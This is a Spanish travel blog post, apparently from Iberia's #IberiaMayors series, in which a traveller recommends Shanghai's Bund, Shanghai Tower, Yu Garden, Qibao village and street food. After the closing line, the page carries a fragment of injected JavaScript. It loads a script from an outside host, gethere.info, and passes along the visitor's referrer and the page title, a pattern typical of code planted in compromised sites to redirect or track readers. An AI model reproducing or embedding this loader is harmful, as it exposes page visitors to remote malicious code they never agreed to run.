Shanghái, ciudad de contrastes #IberiaMayors

28/12/2016

iberia_mayors_mayors_ficha_blog_shanghaiEsta vez te llevamos a la vibrante ciudad de Shanghái, de la mano de nuestro #IberiaMayors, Fernando Pérez, quien describe a la ciudad más poblada de China como un lugar que no te puedes perder si eres amante de ‘la arquitectura, la historia y la gastronomía’.
Nuestro #IberiaMayors empieza el recorrido desde el malecón The Bund,  lugar dónde puedes hacer una foto del impresionante ‘skyline’ de Shanghái, y disfrutar de unas vistas espectaculares del barrio financiero de Pudong, lugar donde se encuentran algunos de los rascacielos más altos de China. Después de disfrutar de estas vistas, nuestro #IberiaMayors recomienda acercarnos a Shanghai Tower, el segundo rascacielos más alto del mundo, desde donde se puede obtener una panorámica de toda la ciudad. Eso sí, solo es apto para aquellos que no tengan miedo a las alturas.

La antigua ciudad china de Shanghái está separada de la nueva (Pudong) por el río Huang Pu. Puedes cruzar de un lugar a otro en tan solo 10 minutos en ferry. Al otro lado del río, os encontraréis con edificios de la época colonial, los cuales todavía conservan reminiscencias del estilo británico, ruso o francés.

En la parada de metro de Yuyuan se encuentra la antigua ciudad amurallada, lugar perfecto para pasear y disfrutar de los edificios, en su mayoría renovados. En el centro de Shanghái encontraréis el Yu Garden, ‘un oasis dentro del bullicio’ según nuestro #IberiaMayors.  Este jardín fue creado por un magnate rico en la dinastía de Ming.

iberia_mayors_mayors_bso_shanghai_v1

En cuanto a la gastronomía, China es famosa por sus restaurantes de pato y por sus dumpling. La mejor idea es disfrutar de esta comida en “un puesto callejero, viendo el ajetreo de la ciudad». Si quieres tener una idea de las magnitudes de la misma, nada mejor que visitar el Museo de Planificación Urbana, donde se puede observar una maqueta gigante y una réplica exacta de Shanghái.

Fernando sugiere ir al pueblo de Qibao, para poder explorar el pasado del gran Shanghái, a través de sus casas antiguas y sus canales. ¡Cuidado con la comida de este pueblo! Tiene unos sabores un tanto peculiares. Para terminar el recorrido, nada mejor que volver a The Bund y ver todos los edificios de Pudong iluminados.

Lo más sorprendente para Fernando de esta ciudad y de este país es ‘que sus siestas son más largas que las españolas’ 🙂 Por último, nuestro #IberiaMayors nos devela un  rincón secreto… El ‘parque del barrio judío, en el que poder ver algunas de las casas más antiguas, así como a gente haciendo tai chi y jugando a las cartas’. Si te animas a descubrir Shanghái, en este link encontrarás los mejores precios.

¡Te esperamos!

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;